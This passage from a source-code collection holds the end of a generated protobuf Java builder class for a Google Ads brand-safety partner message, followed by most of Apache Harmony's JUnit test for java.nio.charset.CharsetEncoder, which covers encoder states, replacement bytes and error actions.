brandSafetyIntegrationPartnerData_ = builderForValue.build(); } else { brandSafetyIntegrationPartnerDataBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. 
* </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public Builder mergeBrandSafetyIntegrationPartnerData(com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData value) { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && brandSafetyIntegrationPartnerData_ != null && brandSafetyIntegrationPartnerData_ != com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance()) { getBrandSafetyIntegrationPartnerDataBuilder().mergeFrom(value); } else { brandSafetyIntegrationPartnerData_ = value; } } else { brandSafetyIntegrationPartnerDataBuilder_.mergeFrom(value); } if (brandSafetyIntegrationPartnerData_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public Builder clearBrandSafetyIntegrationPartnerData() { bitField0_ = (bitField0_ & ~0x00000002); brandSafetyIntegrationPartnerData_ = null; if (brandSafetyIntegrationPartnerDataBuilder_ != null) { brandSafetyIntegrationPartnerDataBuilder_.dispose(); brandSafetyIntegrationPartnerDataBuilder_ = null; } onChanged(); return this; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. 
* </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder getBrandSafetyIntegrationPartnerDataBuilder() { bitField0_ |= 0x00000002; onChanged(); return getBrandSafetyIntegrationPartnerDataFieldBuilder().getBuilder(); } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder getBrandSafetyIntegrationPartnerDataOrBuilder() { if (brandSafetyIntegrationPartnerDataBuilder_ != null) { return brandSafetyIntegrationPartnerDataBuilder_.getMessageOrBuilder(); } else { return brandSafetyIntegrationPartnerData_ == null ? com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance() : brandSafetyIntegrationPartnerData_; } } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. 
* </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder> getBrandSafetyIntegrationPartnerDataFieldBuilder() { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { brandSafetyIntegrationPartnerDataBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder>( getBrandSafetyIntegrationPartnerData(), getParentForChildren(), isClean()); brandSafetyIntegrationPartnerData_ = null; } return brandSafetyIntegrationPartnerDataBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) private static final com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner(); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner getDefaultInstance() { return DEFAULT_INSTANCE; } private 
static final com.google.protobuf.Parser<CampaignThirdPartyBrandSafetyIntegrationPartner> PARSER = new com.google.protobuf.AbstractParser<CampaignThirdPartyBrandSafetyIntegrationPartner>() { @java.lang.Override public CampaignThirdPartyBrandSafetyIntegrationPartner parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CampaignThirdPartyBrandSafetyIntegrationPartner> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CampaignThirdPartyBrandSafetyIntegrationPartner> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/harmony
33,540
classlib/modules/nio_char/src/test/java/tests/api/java/nio/charset/CharsetEncoderTest.java
/* Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package tests.api.java.nio.charset; import java.nio.ByteBuffer; import java.nio.CharBuffer; import java.nio.charset.CharacterCodingException; import java.nio.charset.Charset; import java.nio.charset.CharsetDecoder; import java.nio.charset.CharsetEncoder; import java.nio.charset.CoderResult; import java.nio.charset.CodingErrorAction; import java.nio.charset.MalformedInputException; import java.nio.charset.UnmappableCharacterException; import java.nio.charset.UnsupportedCharsetException; import java.util.Arrays; import junit.framework.TestCase; /** * API unit test for java.nio.charset.CharsetEncoder */ public class CharsetEncoderTest extends TestCase { static final int MAX_BYTES = 3; static final float AVER_BYTES = 0.5f; // charset for mock class private static final Charset MOCKCS = new MockCharset("CharsetEncoderTest_mock", new String[0]); Charset cs = MOCKCS; // default encoder CharsetEncoder encoder; // default for Charset abstract class byte[] defaultReplacement = new byte[] { 63 }; // specific for Charset implementation subclass byte[] specifiedReplacement = new byte[] { 63 }; static final String unistr = " buffer";// \u8000\u8001\u00a5\u3000\r\n"; byte[] unibytes = new byte[] { 32, 98, 117, 102, 
102, 101, 114 }; byte[] unibytesWithRep = null; byte[] surrogate = new byte[0]; protected void setUp() throws Exception { super.setUp(); encoder = cs.newEncoder(); if (null == unibytesWithRep) { byte[] replacement = encoder.replacement(); unibytesWithRep = new byte[replacement.length + unibytes.length]; System.arraycopy(replacement, 0, unibytesWithRep, 0, replacement.length); System.arraycopy(unibytes, 0, unibytesWithRep, replacement.length, unibytes.length); } } /* * @see TestCase#tearDown() */ protected void tearDown() throws Exception { super.tearDown(); } public void testSpecificDefaultValue() { assertTrue(encoder.averageBytesPerChar() == AVER_BYTES); assertTrue(encoder.maxBytesPerChar() == MAX_BYTES); } public void testDefaultValue() { assertEquals(CodingErrorAction.REPORT, encoder.malformedInputAction()); assertEquals(CodingErrorAction.REPORT, encoder .unmappableCharacterAction()); assertSame(encoder, encoder.onMalformedInput(CodingErrorAction.IGNORE)); assertSame(encoder, encoder .onUnmappableCharacter(CodingErrorAction.IGNORE)); if (encoder instanceof MockCharsetEncoder) { assertTrue(Arrays.equals(encoder.replacement(), defaultReplacement)); } else { assertTrue(Arrays.equals(encoder.replacement(), specifiedReplacement)); } } /* * Class under test for constructor CharsetEncoder(Charset, float, float) */ public void testCharsetEncoderCharsetfloatfloat() { // default value encoder = new MockCharsetEncoder(cs, (float) AVER_BYTES, MAX_BYTES); assertSame(encoder.charset(), cs); assertTrue(encoder.averageBytesPerChar() == AVER_BYTES); assertTrue(encoder.maxBytesPerChar() == MAX_BYTES); assertEquals(CodingErrorAction.REPORT, encoder.malformedInputAction()); assertEquals(CodingErrorAction.REPORT, encoder .unmappableCharacterAction()); assertEquals(new String(encoder.replacement()), new String( defaultReplacement)); assertSame(encoder, encoder.onMalformedInput(CodingErrorAction.IGNORE)); assertSame(encoder, encoder .onUnmappableCharacter(CodingErrorAction.IGNORE)); 
// normal case CharsetEncoder ec = new MockCharsetEncoder(cs, 1, MAX_BYTES); assertSame(ec.charset(), cs); assertEquals(1.0, ec.averageBytesPerChar(), 0); assertTrue(ec.maxBytesPerChar() == MAX_BYTES); /* * ------------------------ Exceptional cases ------------------------- */ // NullPointerException: null charset try { ec = new MockCharsetEncoder(null, 1, MAX_BYTES); fail("should throw null pointer exception"); } catch (NullPointerException e) { } ec = new MockCharsetEncoder(new MockCharset("mock", new String[0]), 1, MAX_BYTES); // Commented out since the comment is wrong since MAX_BYTES > 1 // // OK: average length less than max length // ec = new MockCharsetEncoder(cs, MAX_BYTES, 1); // assertTrue(ec.averageBytesPerChar() == MAX_BYTES); // assertTrue(ec.maxBytesPerChar() == 1); // Illegal Argument: zero length try { ec = new MockCharsetEncoder(cs, 0, MAX_BYTES); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } try { ec = new MockCharsetEncoder(cs, 1, 0); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Illegal Argument: negative length try { ec = new MockCharsetEncoder(cs, -1, MAX_BYTES); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } try { ec = new MockCharsetEncoder(cs, 1, -1); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } } /* * Class under test for constructor CharsetEncoder(Charset, float, float, * byte[]) */ public void testCharsetEncoderCharsetfloatfloatbyteArray() { byte[] ba = getLegalByteArray(); // normal case CharsetEncoder ec = new MockCharsetEncoder(cs, 1, MAX_BYTES, ba); assertSame(ec.charset(), cs); assertEquals(1.0, ec.averageBytesPerChar(), 0.0); assertTrue(ec.maxBytesPerChar() == MAX_BYTES); assertSame(ba, ec.replacement()); /* * ------------------------ Exceptional cases ------------------------- */ // NullPointerException: null charset try { ec = new MockCharsetEncoder(null, 1, 
MAX_BYTES, ba); fail("should throw null pointer exception"); } catch (NullPointerException e) { } // Illegal Argument: null byte array try { ec = new MockCharsetEncoder(cs, 1, MAX_BYTES, null); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Illegal Argument: empty byte array try { ec = new MockCharsetEncoder(cs, 1, MAX_BYTES, new byte[0]); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Illegal Argument: byte array is longer than max length try { ec = new MockCharsetEncoder(cs, 1, MAX_BYTES, new byte[] { 1, 2, MAX_BYTES, 4 }); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Commented out since the comment is wrong since MAX_BYTES > 1 // This test throws IllegalArgumentException on Harmony and RI // // OK: average length less than max length // ec = new MockCharsetEncoder(cs, MAX_BYTES, ba.length, ba); // assertTrue(ec.averageBytesPerChar() == MAX_BYTES); // assertTrue(ec.maxBytesPerChar() == ba.length); // Illegal Argument: zero length try { ec = new MockCharsetEncoder(cs, 0, MAX_BYTES, ba); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } try { ec = new MockCharsetEncoder(cs, 1, 0, ba); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Illegal Argument: negative length try { ec = new MockCharsetEncoder(cs, -1, MAX_BYTES, ba); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } try { ec = new MockCharsetEncoder(cs, 1, -1, ba); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } } /* * Class under test for boolean canEncode(char) */ public void testCanEncodechar() throws CharacterCodingException { // for non-mapped char assertTrue(encoder.canEncode('\uc2c0')); // surrogate char for unicode // 1st byte: d800-dbff // 2nd byte: dc00-dfff assertTrue(encoder.canEncode('\ud800')); // valid 
surrogate pair assertTrue(encoder.canEncode('\udc00')); } /*----------------------------------------- * Class under test for illegal state case * methods which can change internal states are two encode, flush, two canEncode, reset * ----------------------------------------- */ // Normal case: just after reset, and it also means reset can be done // anywhere public void testResetIllegalState() throws CharacterCodingException { assertSame(encoder, encoder.reset()); encoder.canEncode('\ud901'); assertSame(encoder, encoder.reset()); encoder.canEncode("\ud901\udc00"); assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("aaa")); assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("aaa"), ByteBuffer.allocate(3), false); assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("aaa"), ByteBuffer.allocate(3), true); assertSame(encoder, encoder.reset()); } public void testFlushIllegalState() throws CharacterCodingException { CharBuffer in = CharBuffer.wrap("aaa"); ByteBuffer out = ByteBuffer.allocate(5); // Normal case: after encode with endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(in, out, true); out.rewind(); CoderResult result = encoder.flush(out); // Illegal state: flush twice try { encoder.flush(out); fail("should throw IllegalStateException"); } catch (IllegalStateException e) { // Expected } // Illegal state: flush after encode with endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(in, out, false); try { encoder.flush(out); fail("should throw IllegalStateException"); } catch (IllegalStateException e) { // Expected } } public void testFlushAfterConstructing() { ByteBuffer out = ByteBuffer.allocate(5); //Illegal state: flush after instance created try { encoder.flush(out); fail("should throw IllegalStateException"); } catch (IllegalStateException e) { // Expected } } // test illegal states for encode facade public void testEncodeFacadeIllegalState() throws 
CharacterCodingException { // encode facade can be execute in anywhere CharBuffer in = CharBuffer.wrap("aaa"); // Normal case: just created encoder.encode(in); in.rewind(); // Normal case: just after encode facade encoder.encode(in); in.rewind(); // Normal case: just after canEncode assertSame(encoder, encoder.reset()); encoder.canEncode("\ud902\udc00"); encoder.encode(in); in.rewind(); assertSame(encoder, encoder.reset()); encoder.canEncode('\ud902'); encoder.encode(in); in.rewind(); // Normal case: just after encode with that endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState2"), ByteBuffer.allocate(30), true); encoder.encode(in); in.rewind(); // Normal case:just after encode with that endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState3"), ByteBuffer.allocate(30), false); encoder.encode(in); in.rewind(); // Normal case: just after flush assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState4"), ByteBuffer.allocate(30), true); encoder.flush(ByteBuffer.allocate(10)); encoder.encode(in); in.rewind(); } // test illegal states for two encode method with endOfInput is true public void testEncodeTrueIllegalState() throws CharacterCodingException { CharBuffer in = CharBuffer.wrap("aaa"); ByteBuffer out = ByteBuffer.allocate(5); // Normal case: just created encoder.encode(in, out, true); in.rewind(); out.rewind(); in.rewind(); out.rewind(); // Normal case: just after encode with that endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState2"), ByteBuffer.allocate(30), true); encoder.encode(in, out, true); in.rewind(); out.rewind(); // Normal case:just after encode with that endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState3"), ByteBuffer.allocate(30), false); encoder.encode(in, out, 
true); in.rewind(); out.rewind(); // Illegal state: just after flush assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState4"), ByteBuffer.allocate(30), true); encoder.flush(ByteBuffer.allocate(10)); try { encoder.encode(in, out, true); fail("should illegal state"); } catch (IllegalStateException e) { } // Normal case: after canEncode assertSame(encoder, encoder.reset()); encoder.canEncode("\ud906\udc00"); encoder.encode(in, out, true); in.rewind(); out.rewind(); assertSame(encoder, encoder.reset()); encoder.canEncode('\ud905'); encoder.encode(in, out, true); } // test illegal states for two encode method with endOfInput is false public void testEncodeFalseIllegalState() throws CharacterCodingException { CharBuffer in = CharBuffer.wrap("aaa"); ByteBuffer out = ByteBuffer.allocate(5); // Normal case: just created encoder.encode(in, out, false); in.rewind(); out.rewind(); // Illegal state: just after encode facade assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState1")); try { encoder.encode(in, out, false); fail("should illegal state"); } catch (IllegalStateException e) { } // Illegal state: just after encode with that endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState2"), ByteBuffer.allocate(30), true); try { encoder.encode(in, out, false); fail("should illegal state"); } catch (IllegalStateException e) { } // Normal case:just after encode with that endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState3"), ByteBuffer.allocate(30), false); encoder.encode(in, out, false); in.rewind(); out.rewind(); // Illegal state: just after flush assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState4"), ByteBuffer.allocate(30), true); encoder.flush(ByteBuffer.allocate(10)); try { encoder.encode(in, out, false); fail("should illegal 
state"); } catch (IllegalStateException e) { } // Normal case: after canEncode assertSame(encoder, encoder.reset()); encoder.canEncode("\ud906\udc00"); encoder.encode(in, out, false); in.rewind(); out.rewind(); assertSame(encoder, encoder.reset()); encoder.canEncode('\ud905'); encoder.encode(in, out, false); } // test illegal states for two canEncode methods public void testCanEncodeIllegalState() throws CharacterCodingException { // Normal case: just created encoder.canEncode("\ud900\udc00"); encoder.canEncode('\ud900'); // Illegal state: just after encode with that endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState2"), ByteBuffer.allocate(30), true); try { encoder.canEncode("\ud903\udc00"); fail("should throw illegal state exception"); } catch (IllegalStateException e) { } // Illegal state:just after encode with that endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState3"), ByteBuffer.allocate(30), false); try { encoder.canEncode("\ud904\udc00"); fail("should throw illegal state exception"); } catch (IllegalStateException e) { } // Normal case: just after flush encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState4"), ByteBuffer.allocate(30), true); encoder.flush(ByteBuffer.allocate(10)); encoder.canEncode("\ud905\udc00"); encoder.canEncode('\ud906'); // Normal case: after reset again assertSame(encoder, encoder.reset()); encoder.canEncode("\ud906\udc00"); encoder.canEncode('\ud905'); } /* * --------------------------------- illegal state test end * --------------------------------- */ /* * Class under test for boolean canEncode(CharSequence) */ public void testCanEncodeCharSequence() { // for non-mapped char assertTrue(encoder.canEncode("\uc2c0")); // surrogate char for unicode // 1st byte: d800-dbff // 2nd byte: dc00-dfff assertTrue(encoder.canEncode("\ud800")); // valid surrogate pair assertTrue(encoder.canEncode("\ud800\udc00")); 
// invalid surrogate pair assertTrue(encoder.canEncode("\ud800\udb00")); } /* * Class under test for Charset charset() */ public void testCharset() { try { encoder = new MockCharsetEncoder(Charset.forName("gbk"), 1, MAX_BYTES); // assertSame(encoder.charset(), Charset.forName("gbk")); } catch (UnsupportedCharsetException e) { System.err .println("Don't support GBK encoding, ignore current test"); } } /* * Class under test for ByteBuffer encode(CharBuffer) */ public void testEncodeCharBuffer() throws CharacterCodingException { // Null pointer try { encoder.encode(null); fail("should throw null pointer exception"); } catch (NullPointerException e) { } // empty input buffer ByteBuffer out = encoder.encode(CharBuffer.wrap("")); assertEquals(out.position(), 0); assertByteArray(out, new byte[0]); // assertByteArray(out, surrogate); // normal case out = encoder.encode(CharBuffer.wrap(unistr)); assertEquals(out.position(), 0); assertByteArray(out, addSurrogate(unibytes)); // Regression test for harmony-3378 Charset cs = Charset.forName("UTF-8"); CharsetEncoder encoder = cs.newEncoder(); encoder.onMalformedInput(CodingErrorAction.REPLACE); encoder = encoder.replaceWith(new byte[] { (byte) 0xef, (byte) 0xbf, (byte) 0xbd, }); CharBuffer in = CharBuffer.wrap("\ud800"); out = encoder.encode(in); assertNotNull(out); } private byte[] addSurrogate(byte[] expected) { if (surrogate.length > 0) { byte[] temp = new byte[surrogate.length + expected.length]; System.arraycopy(surrogate, 0, temp, 0, surrogate.length); System.arraycopy(expected, 0, temp, surrogate.length, expected.length); expected = temp; } return expected; } /** * @return */ protected byte[] getEmptyByteArray() { return new byte[0]; } CharBuffer getMalformedCharBuffer() { return CharBuffer.wrap("malform buffer"); } CharBuffer getUnmapCharBuffer() { return CharBuffer.wrap("unmap buffer"); } CharBuffer getExceptionCharBuffer() { return CharBuffer.wrap("runtime buffer"); } public void testEncodeCharBufferException() throws 
CharacterCodingException { ByteBuffer out; CharBuffer in; // MalformedException: in = getMalformedCharBuffer(); encoder.onMalformedInput(CodingErrorAction.REPORT); encoder.onUnmappableCharacter(CodingErrorAction.REPORT); if (in != null) { try { // regression test for Harmony-1379 encoder.encode(in); fail("should throw MalformedInputException"); } catch (MalformedInputException e) { } encoder.reset(); in.rewind(); encoder.onMalformedInput(CodingErrorAction.IGNORE); out = encoder.encode(in); assertByteArray(out, addSurrogate(unibytes)); encoder.reset(); in.rewind(); encoder.onMalformedInput(CodingErrorAction.REPLACE); out = encoder.encode(in); assertByteArray(out, addSurrogate(unibytesWithRep)); } // Unmapped Exception: in = getUnmapCharBuffer(); encoder.onMalformedInput(CodingErrorAction.REPORT); encoder.onUnmappableCharacter(CodingErrorAction.REPORT); if (in != null) { encoder.reset(); try { encoder.encode(in); fail("should throw UnmappableCharacterException"); } catch (UnmappableCharacterException e) { } encoder.reset(); in.rewind(); encoder.onUnmappableCharacter(CodingErrorAction.IGNORE); out = encoder.encode(in); assertByteArray(out, unibytes); encoder.reset(); in.rewind(); encoder.onUnmappableCharacter(CodingErrorAction.REPLACE); out = encoder.encode(in); assertByteArray(out, unibytesWithRep); } // RuntimeException try { encoder.encode(getExceptionCharBuffer()); fail("should throw runtime exception"); } catch (RuntimeException e) { } } /* * utility method, extract given bytebuffer to a string and compare with * give string */ void assertByteArray(ByteBuffer out, byte[] expected) { out = out.duplicate(); if (out.position() != 0) { out.flip(); } byte[] ba = new byte[out.limit() - out.position()]; out.get(ba); // byte[] ba = out.array(); assertTrue(Arrays.equals(ba, expected)); } /* * Class under test for CoderResult encode(CharBuffer, ByteBuffer, boolean) */ public void testEncodeCharBufferByteBufferboolean() throws CharacterCodingException { ByteBuffer out = 
ByteBuffer.allocate(200); CharBuffer in = CharBuffer.wrap(unistr); // Null pointer try { encoder.encode(null, out, true); fail("should throw null pointer exception"); } catch (NullPointerException e) { } try { encoder.encode(in, null, true); fail("should throw null pointer exception"); } catch (NullPointerException e) { } // normal case, one complete operation assertSame(encoder, encoder.reset()); in.rewind(); out.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, true)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(unibytes)); in.rewind(); encoder.flush(out); // normal case, one complete operation, but call twice, first time set // endOfInput to false assertSame(encoder, encoder.reset()); in.rewind(); out = ByteBuffer.allocate(200); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, false)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(unibytes)); in.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, false)); in.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, true)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(duplicateByteArray(unibytes, 3))); // overflow out = ByteBuffer.allocate(4); assertSame(encoder, encoder.reset()); in.rewind(); out.rewind(); assertSame(CoderResult.OVERFLOW, encoder.encode(in, out, true)); assertEquals(out.limit(), 4); assertEquals(out.position(), 4); assertEquals(out.remaining(), 0); assertEquals(out.capacity(), 4); ByteBuffer temp = ByteBuffer.allocate(200); out.flip(); temp.put(out); out = temp; assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, true)); assertEquals(out.limit(), 200); assertTrue(out.position() > 
0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(unibytes)); assertSame(encoder, encoder.reset()); in.rewind(); out = ByteBuffer.allocate(4); assertSame(CoderResult.OVERFLOW, encoder.encode(in, out, false)); assertEquals(out.limit(), 4); assertEquals(out.position(), 4); assertEquals(out.remaining(), 0); assertEquals(out.capacity(), 4); temp = ByteBuffer.allocate(200); out.flip(); temp.put(out); out = temp; assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, false)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(unibytes)); } void printByteBuffer(ByteBuffer buffer) { System.out.println("print buffer"); if (buffer.position() != 0) { buffer.flip(); } byte[] ba = buffer.array(); for (int i = 0; i < ba.length; i++) { System.out.println(Integer.toHexString(ba[i])); } } public void testEncodeCharBufferByteBufferbooleanExceptionFalse() throws CharacterCodingException { implTestEncodeCharBufferByteBufferbooleanException(false); } public void testEncodeCharBufferByteBufferbooleanExceptionTrue() throws CharacterCodingException { implTestEncodeCharBufferByteBufferbooleanException(true); } private byte[] duplicateByteArray(byte[] ba, int times) { byte[] result = new byte[ba.length * times]; for (int i = 0; i < times; i++) { System.arraycopy(ba, 0, result, i * ba.length, ba.length); } return result; } protected void implTestEncodeCharBufferByteBufferbooleanException( boolean endOfInput) throws CharacterCodingException { ByteBuffer out = ByteBuffer.allocate(100); // MalformedException: CharBuffer in = getMalformedCharBuffer(); encoder.onMalformedInput(CodingErrorAction.REPORT); encoder.onUnmappableCharacter(CodingErrorAction.REPORT); if (in != null) { encoder.reset(); CoderResult r = encoder.encode(in, out, endOfInput); assertTrue(r.isMalformed()); encoder.reset(); out.clear(); in.rewind(); 
encoder.onMalformedInput(CodingErrorAction.IGNORE); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); assertCodingErrorAction(endOfInput, out, in, unibytes); encoder.reset(); out.clear(); in.rewind(); encoder.onMalformedInput(CodingErrorAction.REPLACE); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); assertCodingErrorAction(endOfInput, out, in, unibytesWithRep); } else { System.out.println("Cannot find malformed char buffer for " + cs.name()); } // Unmapped Exception: in = getUnmapCharBuffer(); encoder.onMalformedInput(CodingErrorAction.REPORT); encoder.onUnmappableCharacter(CodingErrorAction.REPORT); if (in != null) { encoder.reset(); out.clear(); assertTrue(encoder.encode(in, out, endOfInput).isUnmappable()); encoder.reset(); out.clear(); in.rewind(); encoder.onUnmappableCharacter(CodingErrorAction.IGNORE); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); assertCodingErrorAction(endOfInput, out, in, unibytes); encoder.reset(); out.clear(); in.rewind(); encoder.onUnmappableCharacter(CodingErrorAction.REPLACE); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); assertCodingErrorAction(endOfInput, out, in, unibytesWithRep); } else { System.out.println("Cannot find unmapped char buffer for " + cs.name()); } // RuntimeException try { encoder.encode(getExceptionCharBuffer()); fail("should throw runtime exception"); } catch (RuntimeException e) { } } private void assertCodingErrorAction(boolean endOfInput, ByteBuffer out, CharBuffer in, byte[] expect) { if (endOfInput) { assertByteArray(out, addSurrogate(expect)); } else { in.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); in.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, true)); assertByteArray(out, addSurrogate(duplicateByteArray(expect, 3))); } } /* * Class under test for CoderResult flush(ByteBuffer) */ public void testFlush() throws CharacterCodingException { ByteBuffer 
